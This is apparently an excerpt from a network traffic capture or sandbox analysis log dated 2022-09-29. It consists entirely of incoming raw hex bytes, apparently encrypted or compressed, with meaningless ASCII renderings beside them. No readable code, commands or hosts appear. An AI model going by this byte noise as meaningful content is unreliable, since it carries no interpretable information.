                                                                                                                                                2022-09-29 12:49:27 UTC4968INData Raw: c5 4a 59 de 94 db 03 68 76 22 35 1b 2a 16 a6 94 bd d7 fe 83 6a f9 a3 80 9f 17 12 3b f6 b7 b6 6f b3 d3 55 12 f2 12 bf 6a 19 3e 28 44 d2 a8 23 82 1e a7 45 ce 6d a9 b1 03 ee b1 76 21 c9 c0 7b 82 22 49 94 d4 84 3f 0e 45 1c b1 e6 ce 06 4d a3 2a 10 d5 d2 38 cf 63 28 fe 8e 41 0e 40 11 bf 22 fa 37 ac 85 87 a4 4d cf bb d6 83 ee 62 87 fb dd fe 74 84 eb 85 ca d8 5e 91 e6 54 f8 f1 9f 29 a6 e6 49 d0 b0 27 93 d5 b0 43 7c 3d 72 bb ef 26 5b 7d b1 b4 f0 e5 21 ed f5 7a 2a e4 e7 d0 71 3a 5c b2 d9 c6 fc 1a f6 df d0 8a e8 e9 3d 15 b8 97 75 e3 0e ea b5 53 4a 58 d4 ef 2f 93 9b 21 1b b1 2f 47 57 7c 55 29 75 51 ea 05 5b 02 fc d0 d1 e3 f6 1a a5 12 69 5d 51 2b c0 18 2f cd e1 86 cd 97 33 ec 75 e9 db 5b 76 57 c4 5f 5c 4c 34 d6 31 65 c6 42 cf 66 ba ee c5 ba 25 c9 cc ab 86 fe 52 69 89
                                                                                                                                                Data Ascii: JYhv"5*j;oUj>(D#Emv!{"I?EM*8c(A@"7Mbt^T)I'C|=r&[}!z*q:\=uSJX/!/GW|U)uQ[i]Q+/3u[vW_\L41eBf%Ri
                                                                                                                                                2022-09-29 12:49:27 UTC4984INData Raw: cd 85 8b ed e9 0e 8b ec c8 1a 77 94 4e 49 39 0a c4 3b b6 56 8e 18 87 8b 8f 0a dd 7d a5 2e e8 29 fb b8 2b 29 46 58 df b5 da 5b 94 b8 9c 49 fd 24 6d 44 5d 34 34 12 e8 2c e4 61 22 7f 21 ad f3 00 11 d5 53 da 39 ed b9 1b 00 c5 49 fd c5 c9 ed 09 1e 96 ec 96 aa c0 8e 62 83 17 15 1d 47 72 a5 3d a5 70 9c 5b ae 84 81 fe b9 b2 76 bf 4f af 52 69 eb 1b c9 b8 a9 48 ba 38 47 7e 0e fc 76 e3 b0 2b c1 15 b4 ff 58 26 06 cb f5 b9 c7 e4 7f 5b c5 51 e2 bc 4f 91 fe e6 6d fb 4c ca d5 83 23 2b ba c8 cc 57 44 47 87 9a 6a 81 fb a7 00 2c 5e f5 dd c7 52 cf 8d 45 83 e0 eb 81 db 00 49 e2 e8 e0 7d 11 31 0d 8f 5c 21 de 24 d4 b9 d8 83 40 a9 5f e3 73 92 26 02 a6 5b 67 69 da c2 f6 f2 8d 6f c2 45 8a 6c aa 7e e8 b0 9d ac 09 5d 47 24 f6 5a e7 34 32 61 85 6c 7a 88 b2 63 3d 2c d4 ec 60 9b e8 81
                                                                                                                                                Data Ascii: wNI9;V}.)+)FX[I$mD]44,a"!S9IbGr=p[vORiH8G~v+X&[QOmL#+WDGj,^REI}1\!$@_s&[gioEl~]G$Z42alzc=,`
                                                                                                                                                2022-09-29 12:49:27 UTC5000INData Raw: 34 0a 3b 99 a4 28 71 43 39 50 14 87 04 74 da d6 5d 9b ea 61 8c 63 12 20 34 d1 44 6d 34 60 df 5c 26 ba 7c 96 8c da e8 4c 3f 5b de 8d f7 ed 87 3d 69 49 ee 86 68 32 43 52 d0 d1 f4 b6 8b 76 c7 bc 00 6a d2 5e a9 88 e8 8c 0c f4 7e 15 3c 8e 00 89 dd 16 79 16 1b 14 ee 0f f3 9f fc 66 9a 70 ed 02 83 0b 1c a8 79 b8 22 d5 c6 2d ac 0a 43 c2 c1 49 f9 38 25 c1 2a d7 b6 df 5a ce 2d d9 d9 f2 6d d3 48 04 54 70 78 5e b7 5d 70 3a 8f 27 58 18 90 a4 e2 cc ab bb b3 c9 5f 8b 31 bf 3e 77 26 f6 e2 32 03 5e b2 11 58 64 55 b6 03 2f b1 32 94 9e fe 73 a3 82 5d 5c bb e9 38 e1 52 22 f7 e5 dd d9 d9 b5 dd 2e 1c 0c 8a 8d 1a af a1 1f 67 3d 6a 3e f2 27 de 9c 77 62 d4 26 97 8c 59 a9 79 39 72 d2 a4 e8 fe 8f c2 6f 27 77 c6 3c c4 15 ed 9b 02 05 29 79 55 c9 e3 a7 3d 1f 6e a1 3e 3f f1 a1 cb d8 73
                                                                                                                                                Data Ascii: 4;(qC9Pt]ac 4Dm4`\&|L?[=iIh2CRvj^~<yfpy"-CI8%*Z-mHTpx^]p:'X_1>w&2^XdU/2s]\8R".g=j>'wb&Yy9ro'w<)yU=n>?s
                                                                                                                                                2022-09-29 12:49:27 UTC5016INData Raw: c9 87 4a fc 82 bc 46 2f eb 50 ea 56 63 2c c4 94 3d 5a ed 72 66 71 58 0e d0 1b bd 61 74 74 07 89 27 15 72 08 5e c4 66 93 07 bf 5f 76 56 89 a2 17 03 78 25 50 1f ae d0 42 e9 6b 28 bc 36 e9 51 19 82 20 c7 52 41 b1 9c 4d 87 3a 72 82 19 89 08 09 2d 5c 59 d4 f3 5b 71 a8 18 c5 1a 16 1d cf 47 be 1c 44 3e 5e 83 30 c3 e7 84 04 46 f9 69 59 b4 f8 82 9c 67 12 69 2c 46 e6 aa ed 2a 6b e1 0c 71 c1 29 ed 6a 12 d6 3c e0 f0 27 4a b4 44 59 7a 5b 12 b6 5e d8 83 37 60 1a 89 6c 73 c8 bc 55 06 17 f1 be 17 73 f9 5b bd ba cd 73 25 be d5 f6 eb 79 6c b1 45 20 1a 4e 43 09 b6 b9 11 e8 bd f6 02 a9 91 c2 53 3e cc eb 14 8b 61 02 b1 9d 53 6f 67 2a a5 7b 8b ea b6 d6 c9 5d c6 10 c1 1c 32 1d d2 31 1a 60 bb dd 66 26 18 70 85 e7 a2 54 c7 de 54 ae d5 27 d1 b2 44 2c 1f 8d f8 d6 3f d5 7a 20 b0 bf
                                                                                                                                                Data Ascii: JF/PVc,=ZrfqXatt'r^f_vVx%PBk(6Q RAM:r-\Y[qGD>^0FiYgi,F*kq)j<'JDYz[^7`lsUs[s%ylE NCS>aSog*{]21`f&pTT'D,?z
                                                                                                                                                2022-09-29 12:49:27 UTC5032INData Raw: a1 d5 0c ac 94 25 a2 c5 46 f2 44 75 9a 71 99 94 ef 86 e8 b9 d7 b3 c4 f2 ff 56 f6 fc 87 c6 0b b9 20 bc 66 e2 08 67 73 29 e1 67 18 c9 7c 3a fb 27 31 14 9c dc 8a 0c 8c 64 fb 55 2d 91 13 91 74 22 a4 88 51 58 4d 3a 20 d0 d5 65 5b a7 b7 7e 46 61 c8 24 24 2f d8 90 ed 3c 99 32 08 b4 45 5f 4c d0 16 a4 56 27 a5 ed 63 ff aa df 24 22 8c 74 f2 b8 2f 20 ff d1 49 2c ae f8 de 85 27 50 13 3d 0d f7 55 57 b4 18 19 69 44 1c 10 8d dd d5 4f b4 b7 e8 6c e1 0e 6b 1c c5 be e5 9a 3b 05 54 95 59 a9 f3 07 ab 5e 5b bd e7 47 5d b2 ce 2a dd 15 13 5d 7b c7 6a 83 28 d4 51 4e 02 8d 75 62 a3 a8 e7 f9 35 b1 41 8c a4 37 5c 96 22 dd 89 f9 eb 83 88 7d 87 1d ac 8e ce 26 13 8f 77 0c ef 2a 01 08 4f f6 71 53 75 91 1a a7 e1 2a 01 ce d7 18 1f 4d 5d e2 3a bc 78 77 54 82 48 71 c1 77 a2 79 51 5e 05 1d
                                                                                                                                                Data Ascii: %FDuqV fgs)g|:'1dU-t"QXM: e[~Fa$$/<2E_LV'c$"t/ I,'P=UWiDOlk;TY^[G]*]{j(QNub5A7\"}&w*OqSu*M]:xwTHqwyQ^
                                                                                                                                                2022-09-29 12:49:27 UTC5048INData Raw: d7 7a 6e d7 43 bc 72 a4 fa 5c fb a4 db b3 c2 40 6a 05 7c 86 95 c9 d9 12 f5 fb c0 ee dc e6 a0 96 6b 6b d9 0f a5 56 39 f6 3a 86 5a 4e ee 52 d3 b1 d5 44 7a 47 04 2a 81 34 a5 23 a9 e3 4e 2d eb 73 15 60 ee 30 bc cc b7 f2 67 97 6a 35 ca 7d 20 85 63 8a 25 58 02 85 b9 3a 47 08 d4 3c ae 22 3b 3a 8a 91 49 dd 42 c7 1a 9e f7 49 82 d3 b6 99 24 0f e6 00 1e ee d5 73 b8 d2 cf 35 9b 19 19 06 b1 8e b3 a7 48 67 b2 09 4d 34 2b 4a d1 a3 85 9b 52 34 55 4a 11 e7 6d ae 34 40 7e b4 e2 98 85 76 30 28 5d 46 c4 ca 41 ba a5 3a 0b 3f f5 5d b5 dd ec 04 21 2e 0f 26 01 47 4d e8 3c e2 94 8b 97 71 7d 23 93 2d 1e 67 c4 56 03 af ed d0 b2 7f 78 6c 91 8a d4 4d 11 06 cc b2 85 87 b8 65 a5 b6 b6 88 45 3c b8 c9 3d 6e 43 80 98 a6 eb 79 6c 84 c0 e0 b7 38 1d d6 d7 5a 07 96 4b 81 35 97 a3 8e 51 90 0e
                                                                                                                                                Data Ascii: znCr\@j|kkV9:ZNRDzG*4#N-s`0gj5} c%X:G<";:IBI$s5HgM4+JR4UJm4@~v0(]FA:?]!.&GM<q}#-gVxlMeE<=nCyl8ZK5Q
                                                                                                                                                2022-09-29 12:49:27 UTC5064INData Raw: 60 5e db b1 d8 5b b1 fd fb b6 23 a1 fc eb 95 83 d0 35 8f 5e 68 52 27 bb 68 5f 00 f1 9b d2 27 2e 9a 9b d1 3c e7 54 61 ab 77 5d 76 2d bc 45 3a c5 11 f9 09 9a 80 c3 35 34 17 01 00 50 0e 53 49 d9 40 71 5c 6d 3a b5 8b 81 9b af 64 57 17 7c 93 1a 46 55 3c 04 7a 4d b4 22 95 45 84 39 05 c7 c9 69 d5 97 d6 4e 32 38 15 03 08 51 67 07 24 0c 0a 3d 3c b8 65 d1 56 1b 39 18 2f bb a4 29 ee 2e 6e a2 4e fa ae c1 e9 38 fb f9 1f bb 3b 6f 68 49 c8 f5 7c b8 2b b4 64 29 7c cb 48 c7 bd 17 c0 12 a8 f8 c3 54 63 2f 74 d2 56 2f 75 14 a4 19 45 c2 5b 12 61 73 d5 12 92 63 71 15 2d 7e b3 a2 ba 8a 9e ad 41 dc b7 1e 59 55 e8 43 75 07 ac 8f 10 c1 cd b8 f5 b3 b2 ee 32 a8 4e 1d cb 40 47 80 3d e9 97 0b d4 5c b3 a6 80 6c 4b 73 4d 69 b2 95 4a 42 95 c8 d8 49 21 27 81 c6 21 bb 30 ce 76 45 bb 04 5b
                                                                                                                                                Data Ascii: `^[#5^hR'h_'.<Taw]v-E:54PSI@q\m:dW|FU<zM"E9iN28Qg$=<eV9/).nN8;ohI|+d)|HTc/tV/uE[ascq-~AYUCu2N@G=\lKsMiJBI!'!0vE[
                                                                                                                                                2022-09-29 12:49:27 UTC5080INData Raw: 27 a2 4f bc 14 fd ac 61 cc 2e ca 4f b6 5b 38 4c e8 d5 cd 93 60 73 a6 e6 df 9e 8e e0 11 5d a1 f9 21 54 3e b3 1f 20 ec fd c1 4b c8 99 14 f8 f3 f7 85 c1 95 ef e0 0e d5 1f aa a3 8a 4a 84 f5 c0 03 03 74 3a 9c e2 d0 dc 16 d7 7b 98 0c 2d ee 1c 39 00 73 72 64 26 d0 a7 d1 05 bc f4 10 94 6b 29 83 2f 10 f6 f2 f1 2d ad 81 93 d2 49 cf 6c b8 42 52 b9 a6 c1 01 51 34 0c c0 04 76 81 2d 9a 15 2f c6 ff 57 42 3e 37 57 7a 25 48 0c c6 7a f1 5d af 77 e0 08 6b 9c ad 86 5c 01 d6 4a 81 8a 91 64 43 23 29 2b ec 1e b1 0f 82 4d 1a 25 df 75 21 a2 5d 14 24 87 9e 3c 4c 99 8b d9 f4 d2 a8 b4 3f 6d 96 5b 0e f4 91 77 38 c6 d8 17 ff c9 c4 d7 8c 86 74 ce d5 6a 96 28 60 36 8f c9 ab 8c a5 02 b6 e9 56 f5 5f d4 0a 01 c5 de 1a 18 90 bb 15 74 97 b7 6c d2 dd 38 28 f0 dd 10 0d d4 b0 6b 8b 60 82 65 06
                                                                                                                                                Data Ascii: 'Oa.O[8L`s]!T> KJt:{-9srd&k)/-IlBRQ4v-/WB>7Wz%Hz]wk\JdC#)+M%u!]$<L?m[w8tj(`6V_tl8(k`e
                                                                                                                                                2022-09-29 12:49:27 UTC5096INData Raw: 29 1c c1 d3 56 fc 21 aa 5c e0 c8 a3 a0 41 6d d0 35 29 15 be 48 40 f5 83 e5 e7 07 36 00 c9 ea 8b 99 de 0f 93 b0 0e eb 63 dd 61 00 51 d6 67 b9 15 c6 ad 3e 8e b9 fc 7c 48 d3 37 3d 6a 40 86 81 90 d6 13 2a 56 38 d0 f3 f4 ba 97 e7 05 77 82 8f d4 76 b1 02 d4 fe 0a 60 ff d4 1b 63 89 e0 e0 54 32 4c e3 ae c0 02 ca d6 c0 11 ca 86 b8 67 bd ee 79 bf 46 41 87 7a e8 a3 7f f6 67 e9 eb 8d f7 a6 54 ad ef 04 56 72 79 5d 69 11 87 81 ce 1a de 4b 72 55 3b 46 7a 05 69 24 19 fe 37 e7 b0 fe f8 6b 9a 1a c4 78 07 89 a8 ee b8 e9 b0 d9 39 01 36 35 10 4c c6 6c c3 91 81 d4 75 19 7b 07 6c a7 2b b9 f5 76 df 42 4c 39 79 26 d7 8f 68 74 8e 2c 06 b1 b7 fa ec 22 a1 63 bf 79 2b 02 d6 a4 f6 bc f6 f9 8f 5b ef 73 dc be fe 83 b7 77 59 a1 2b d5 1f dc 6c 55 3c 01 a5 40 56 eb d1 d1 a3 e1 31 d5 1f b4
                                                                                                                                                Data Ascii: )V!\Am5)H@6caQg>|H7=j@*V8wv`cT2LgyFAzgTVry]iKrU;Fzi$7kx965Llu{l+vBL9y&ht,"cy+[swY+lU<@V1
                                                                                                                                                2022-09-29 12:49:27 UTC5112INData Raw: ce 69 8d 00 ba b8 e1 a6 16 cb fa ed 0d f5 5f 68 00 f3 b5 97 fe 61 a8 8e 37 95 ed ed 92 39 5d 2b da cd c9 92 86 ac 16 b4 b6 32 06 72 a7 d7 ee 9b c7 1c e0 dc 43 51 c4 fb 08 49 37 c3 47 e2 fc 38 ff 99 13 62 e4 0d 58 6e e3 cd e9 0e c0 63 b7 45 09 a6 55 86 ab 7d 2b d0 64 6f 4a d6 fe 11 49 73 50 b5 7b 8b 60 ac e5 f2 80 aa b1 2f 73 b4 91 13 dd c5 e0 4f 9b fb fd 3a 41 1b 92 fc 12 d1 90 04 1e 99 40 1d aa 67 7f 42 65 8f 28 e0 7a 09 f3 48 c5 c0 0b a2 9b 29 a0 1c 5c 31 5c 24 6b e9 a0 b7 c8 cf 9d 1e a3 80 fa 1c 99 c4 87 c6 59 b2 f8 31 a5 a7 0e 20 e6 5c 73 ba e4 62 f8 26 55 7b e5 69 28 be 9c 43 0e de 60 b3 a2 35 04 57 d0 9b 94 e2 6d 8a c9 dd 4f 15 de 4c 49 42 cd 7f 1d 67 0b bf 45 c4 2e 56 f0 46 d4 18 26 e4 c0 b9 2b 53 7d bb 16 5a 5d 02 be f8 82 6c 5f a2 a0 e6 3a f9 29
                                                                                                                                                Data Ascii: i_ha79]+2rCQI7G8bXncEU}+doJIsP{`/sO:A@gBe(zH)\1\$kY1 \sb&U{i(C`5WmOLIBgE.VF&+S}Z]l_:)
                                                                                                                                                2022-09-29 12:49:27 UTC5128INData Raw: 21 b3 39 8d 42 53 d9 52 48 74 eb 91 60 03 bd f7 61 bd 1e cb 0c 06 96 2b 6d f6 c7 c2 10 3c 2c 92 41 b6 3c f2 f9 90 d5 9c a2 5e 9a 6e 73 86 06 6c 01 e0 ae cd c5 ec 23 d2 14 d0 fc cb b1 8c d7 52 0b 39 3f bf 96 53 50 27 9a f7 fc 33 60 3e 0e 50 f5 35 4a 0d ca 5f 32 8d c6 06 e8 9d 72 22 17 9b 95 a9 00 01 9e 61 6c fd e8 c7 cb fa c1 b3 df 56 e0 70 79 0b 35 ea 3a 16 ce a7 bd 00 ec 75 d7 6e f8 6e 0d 96 f2 03 10 e0 54 df 1d ea 6a e4 47 43 15 8d 20 c8 0c 7d 91 4e 4f 8d 25 95 12 63 8a 8d 07 8c 37 11 19 e7 2e b8 2c ea 67 7e e6 bf c2 94 7f 4c 1b ba 9c a9 99 d2 f1 bf 49 7a 52 e3 75 e0 2c bb 5d f7 1f 24 9c 18 e8 cf 86 f4 f5 49 8c 86 f0 4a 28 fc 4b 37 1d 88 27 21 3e bc 71 70 a8 d1 64 a3 1d a2 d4 45 66 d9 6c 42 d1 16 ba 5d 5b 8f 67 18 ed 2a b9 b5 9b 5a 60 b2 0b 5f 4b ca a7
                                                                                                                                                Data Ascii: !9BSRHt`a+m<,A<^nsl#R9?SP'3`>P5J_2r"alVpy5:unnTjGC }NO%c7.,g~LIzRu,]$IJ(K7'!>qpdEflB][g*Z`_K
                                                                                                                                                2022-09-29 12:49:27 UTC5144INData Raw: e2 e3 55 ce 6d f5 37 f6 52 1c 88 fe 96 e5 78 28 cd 93 92 a0 ef c8 d1 64 db 20 b3 23 64 a2 4b fc 64 52 27 cb da 13 95 35 a6 03 dd 18 5f 87 72 04 26 fc e6 17 e1 6e 28 9d 26 10 4f 1a 68 0f dc 5e 86 92 92 76 63 3b 6a 6d 98 3d b6 34 62 4f f0 89 e3 70 42 d3 93 d3 ee 35 37 32 e5 0f 0f 97 17 d5 00 56 da 25 3c ad 54 a8 00 46 66 13 13 6d c4 4d cd 74 1c 01 42 e0 e9 69 78 8f 06 c8 08 a8 1f a1 92 b3 46 5c 9a b9 32 84 45 7b ba a1 85 51 b9 60 42 c5 a2 c4 70 eb c9 44 09 ec eb 58 01 70 0d 34 11 36 ba 1a 96 93 a6 58 f5 b1 eb 38 6a 46 46 97 4b 78 80 2a e7 b2 60 20 34 f3 c4 4e ae a3 51 84 62 b9 99 93 02 62 6d 0e 6b 10 9e 2b 02 d8 4b 9c 38 64 e4 91 95 92 b4 66 55 8f 42 66 be 01 83 1c 6b fc 8d 79 57 0d 4e c6 ed f8 d4 c6 c4 d7 a9 9e f8 7e 62 37 f2 43 dd 33 43 6d 60 0e 7a bb 43
                                                                                                                                                Data Ascii: Um7Rx(d #dKdR'5_r&n(&Oh^vc;jm=4bOpB572V%<TFfmMtBixF\2E{Q`BpDXp46X8jFFKx*` 4NQbbmk+K8dfUBfkyWN~b7C3Cm`zC
                                                                                                                                                2022-09-29 12:49:27 UTC5160INData Raw: 29 00 fe 78 2c c3 2d a0 06 ab b6 37 40 dc 15 7d ea f7 47 f2 38 0e 9e 17 ea e9 a8 e2 b4 09 90 bb 37 03 6e 3f 15 f5 1c 54 a3 67 6e 2e 26 a0 cf 0e 63 7a ce 89 61 a1 62 a9 32 2d 1d f5 ae ad 86 a2 a3 cd 2f 00 90 26 f9 12 1e ff eb b7 86 ff d8 0e 44 d2 ad ae e6 07 91 db 96 47 de 5c f0 dd 02 7f b5 b1 19 e2 80 68 4f bf d1 7f 36 e3 3e be 68 50 04 c1 02 f2 43 f7 c2 72 4d 89 e1 b3 da 4a 11 07 9c 23 16 02 0b 51 4a 51 9a 64 bc 05 05 9d 52 0b b3 11 1f 3d 91 e2 84 59 47 b4 41 d7 de 2f c9 10 ee be af 9a 9f 6f 2b 77 9d 16 17 7c 1a 9d 2d e2 d8 98 ce 9a 77 4c 01 e3 30 06 5f 8c d2 46 fb 13 f8 62 e7 cd b1 e4 ea e8 d0 e6 22 8f ab 8e 6f 86 01 43 25 ec c5 b3 3e 69 8b c7 7e aa 36 ae be 32 2b c8 8b 36 b0 fd f0 2a 86 8a 71 3a 6f a2 55 17 b9 38 83 33 32 1e e6 a0 f4 4f 9e 21 d7 d5 c9
                                                                                                                                                Data Ascii: )x,-7@}G87n?Tgn.&czab2-/&DG\hO6>hPCrMJ#QJQdR=YGA/o+w|-wL0_Fb"oC%>i~62+6*q:oU832O!
                                                                                                                                                2022-09-29 12:49:27 UTC5176INData Raw: 8b ae 56 c3 02 12 11 ef 9b b3 3c 26 fd 93 47 8a 28 8c b3 c0 79 81 71 81 86 7f 98 a8 e2 6b dd bf 25 85 01 80 ce e6 cf 21 bf 77 d5 04 24 b9 f5 6c 3c e7 f5 b1 7d b1 07 4f de 02 78 1b be a4 35 37 7c 74 94 14 20 c7 4d 4a a7 c7 85 a1 12 76 3c e2 47 e4 a7 e3 cf a4 0a 04 ea 67 ff 7c e3 44 5f d4 cc 52 7e a8 b3 bf 16 af b8 13 08 3f ca 68 45 16 36 a0 ea db 03 04 a7 ab 66 25 be ff 49 c6 71 23 49 96 e8 fc 17 a6 29 6b 58 b2 d7 0e a7 8c 2d ea d5 f9 8e 9a 19 58 6b a3 63 fa 20 c7 b2 ef e3 fc 32 49 8f 39 0c 63 fd 75 ff 7f 25 00 ea a9 50 a9 ea d9 a2 42 31 88 30 a6 0d dd 8a 04 0c 67 b6 b3 97 59 21 d5 c1 60 37 ab 7b 60 22 d5 52 4d 92 a6 c3 8e c7 8d 17 f9 8c 29 7d aa 50 7d 4e 16 86 0b 71 af 4d 6b 36 8d f3 a4 5b 5f cf 60 2b 39 cd 2f 5b 28 18 7b 01 05 53 39 d5 48 9b 78 9a de 0c
                                                                                                                                                Data Ascii: V<&G(yqk%!w$l<}Ox57|t MJv<Gg|D_R~?hE6f%Iq#I)kX-Xkc 2I9cu%PB10gY!`7{`"RM)}P}NqMk6[_`+9/[({S9Hx
                                                                                                                                                2022-09-29 12:49:27 UTC5192INData Raw: b6 ad b5 de d7 a1 ef 43 e3 75 df 36 22 ce 39 fb da 22 2d e4 2b 88 02 28 80 08 13 b3 3e 2e 8f cd b9 ed 51 d5 d5 e7 59 ca 05 cd e0 b0 63 0e 60 2f a8 d8 00 0c 53 dc fa 61 cc 50 4c f2 72 60 79 8b 9c 50 81 2e 2f 88 4b c2 90 7e 24 d4 ed 74 b3 d8 3c 7e c4 63 83 93 55 4b af b1 5b 68 ad 60 54 27 cf 18 c1 2d e4 75 8d 4a 0c a2 3f 1c 76 f2 f5 8f 01 29 46 16 76 9b 46 f2 2a 36 36 24 68 c7 75 10 49 a6 59 49 89 b0 42 90 a7 eb be 36 1c f6 f3 d1 5d 03 7c 84 0e 3f 40 97 e9 8d 41 5c 2d 5e fd 62 ac 10 07 f7 dc bb e8 3b 7d ae 6d ec 2a f8 38 aa 6b 9d b8 80 12 a5 49 6d aa 59 54 17 b7 fa c6 12 ce 6d 52 28 6a fd c5 bc f9 93 33 a4 e0 0a 03 ec 29 a4 57 4f 39 f0 6a c8 6d 6c 64 ab 40 cd 6c ec 8d 30 95 14 8a 66 96 af 24 11 bb 93 da a5 1a eb b4 87 7d 43 63 be 9d 27 f1 4e 3e c0 3a 62 14
                                                                                                                                                Data Ascii: Cu6"9"-+(>.QYc`/SaPLr`yP./K~$t<~cUK[h`T'-uJ?v)FvF*66$huIYIB6]|?@A\-^b;}m*8kImYTmR(j3)WO9jmld@l0f$}Cc'N>:b
                                                                                                                                                2022-09-29 12:49:27 UTC5208INData Raw: ec ac fa ac 2d bf 62 8e a0 84 51 ca a7 e1 79 c0 f0 4d aa bb 38 4a 17 28 11 76 95 c6 bd d4 37 9d a4 ed 57 df 50 35 45 f3 16 fa 9e 1d 85 bc de 85 05 0b fd 0f 82 d3 24 e8 10 6c 28 02 a5 5f 64 4f d9 47 85 6a 2c 92 e4 eb 77 2f 22 91 f5 44 10 67 57 ab ca 8b 51 07 f2 6f c7 5d 8c 63 81 f2 72 df 65 6f fb 3a 16 7f 6a f2 8d 54 a1 2c a2 7a cf be a4 79 63 fa 93 fa dd 3c a7 c0 c6 e3 09 66 5e 0a fe d1 37 79 dc 1d 16 d6 92 47 7c 0a 60 30 dc ae ba a4 d8 63 2c 8f e3 71 79 60 a7 26 fa 1a f6 64 d1 3f 0c 59 7a 4b 70 65 0c e4 0f 10 e9 e3 20 c9 f3 27 6a ed ab 42 49 31 9b a2 af bd 2b 4c 7e dd 26 28 5d 23 dc 3c 44 60 e0 d7 08 c2 35 28 61 2d 1a c2 f7 ff e8 0f 02 90 a8 e2 34 8b 36 34 a3 4a 98 3d 88 73 da f6 da 24 fe 66 49 2d b3 ed ab 91 ac 14 3c 71 91 7c 65 cd d1 5d 6d a2 db 3c 56
                                                                                                                                                Data Ascii: -bQyM8J(v7WP5E$l(_dOGj,w/"DgWQo]creo:jT,zyc<f^7yG|`0c,qy`&d?YzKpe 'jBI1+L~&(]#<D`5(a-464J=s$fI-<q|e]m<V
                                                                                                                                                2022-09-29 12:49:27 UTC5224INData Raw: 5e e7 e2 b2 6a bc 1f 3f c6 90 08 2f 9e 27 11 26 55 77 ee 30 38 43 96 ff 46 e3 e5 5d b9 93 65 e9 86 f8 02 75 cd 58 de 1e 9c fa a1 14 e5 6c af 77 00 cf 32 83 ce 34 d8 b5 0e 77 17 52 de e9 f5 a3 9e ec 38 91 dc bb 0d e6 47 97 83 67 35 be 1f 67 b4 e2 d4 09 8d e4 0c c0 af 09 82 6c 57 af e1 bb 6c e2 79 e5 6a 78 0d bd 3a 3b 03 7e f8 d3 a7 fa 94 f8 e7 70 88 fa 22 10 ea 6b b4 a1 37 70 b0 92 53 66 8c 99 b3 81 26 df 6a ad 90 ff 96 61 79 c2 2a 8f 99 92 0a 77 2f 25 0f b6 78 08 ec b4 da 9e f2 2a 9d 69 7a 27 07 c7 96 dd 1d 92 92 ac 88 3d 47 d7 12 de fc 4c 88 9d dc c5 3d 99 34 7f 15 46 20 52 cd 29 f0 df 96 2b b2 bd 33 a8 f7 b8 9d 30 b5 5d d2 0a 1a a0 31 7f d7 2b 79 09 7b a0 6c 98 0d d5 88 42 9e ae 6b 80 0b 0e 50 8c 89 76 7f 43 b9 58 e5 2f fe 0a 13 70 9b ce 95 17 44 a4 81
                                                                                                                                                Data Ascii: ^j?/'&Uw08CF]euXlw24wR8Gg5glWlyjx:;~p"k7pSf&jay*w/%x*iz'=GL=4F R)+30]1+y{lBkPvCX/pD
                                                                                                                                                2022-09-29 12:49:27 UTC5240INData Raw: 79 11 e1 f8 e9 46 d0 bf 03 8b ac 70 ea 88 b1 dc f2 80 d4 96 e9 72 01 d6 e0 e8 52 32 bf 60 39 0d 26 9e b8 18 e8 ac 6f 13 f6 9a 6c a2 08 00 62 3e 17 d2 ec 91 4b 1a da 59 4b a9 d7 b0 82 97 8c 99 a7 90 33 e8 be 81 d0 93 f0 27 3d 96 e8 af d7 44 26 48 ca fd 59 8e 44 95 d7 31 6d 43 67 e4 ed b4 b6 7d dc 6a a8 c3 98 18 d5 32 50 34 48 d8 38 cb 63 b5 99 57 4c 9b 7e ab 14 1f 2d e8 05 74 17 59 de e5 9f 04 84 42 ff 89 a8 ad bd 7c 8f 64 db a6 50 b2 80 c2 d1 0b dd 90 52 84 61 03 b6 52 e0 b6 0d 6a 95 2d 15 16 6e 76 16 2b 39 4c 7e 2e 85 b6 2a 8a 5b 95 91 b5 d7 d8 75 c7 46 32 8a c2 9e 36 f3 72 89 db f5 2f bc 88 e1 30 af 0c d1 96 99 c8 7a 65 50 f2 71 fa 11 5d 48 be da 79 cf e5 14 97 7d d1 ea 54 eb c3 a5 b5 df d2 d8 2c 71 c5 57 48 59 81 44 f0 33 5d c9 df 05 27 98 25 bb 5d b2
                                                                                                                                                Data Ascii: yFprR2`9&olb>KYK3'=D&HYD1mCg}j2P4H8cWL~-tYB|dPRaRj-nv+9L~.*[uF26r/0zePq]Hy}T,qWHYD3]'%]
                                                                                                                                                2022-09-29 12:49:27 UTC5256INData Raw: 2d 81 b4 2e 63 50 d7 36 8d 58 9b a5 45 0c 0a 4d c7 77 f9 f7 2e 0d 19 5a 4e 3d 3d cf 63 ca 1f ad 5d fe 60 75 3d 87 91 da 28 2a af e8 5f 14 a4 72 75 11 41 8a e6 1e 88 a6 9b ce f6 9f a4 9c f8 57 bf b5 89 25 f7 ec a4 f8 4e 35 f4 0f 85 8d a7 61 71 79 84 c3 fa 90 37 99 71 c2 eb d9 e5 f2 10 b3 d7 0b 50 24 72 d3 cb 9a fc 6d c6 a7 81 b1 57 b1 6b 84 dd 72 20 88 be 6b 31 b3 c0 87 71 dd 02 06 ea bd 64 fc df 17 1c e1 b4 f5 f2 81 35 f5 2e 24 83 47 b1 cb b1 c3 1a ab 2f d6 ae 3d 24 81 b2 7a 70 bb d6 f8 ca a2 94 d8 eb 1e cf 1a 29 cc 1f e0 92 ab df 98 12 a5 25 ad f5 22 05 3e a9 4f 01 be 1c 48 eb 43 d5 0b 98 a2 f6 86 aa fc a3 31 75 28 ac b2 c7 91 ea 68 88 23 c5 20 81 ad 23 71 06 ad d6 34 52 34 fa a2 58 96 de fe 3f 4f 57 5a 37 80 0c e7 6f c1 77 01 e7 58 5d 7e 16 5a 52 ba 6a
                                                                                                                                                Data Ascii: -.cP6XEMw.ZN==c]`u=(*_ruAW%N5aqy7qP$rmWkr k1qd5.$G/=$zp)%">OHC1u(h# #q4R4X?OWZ7owX]~ZRj
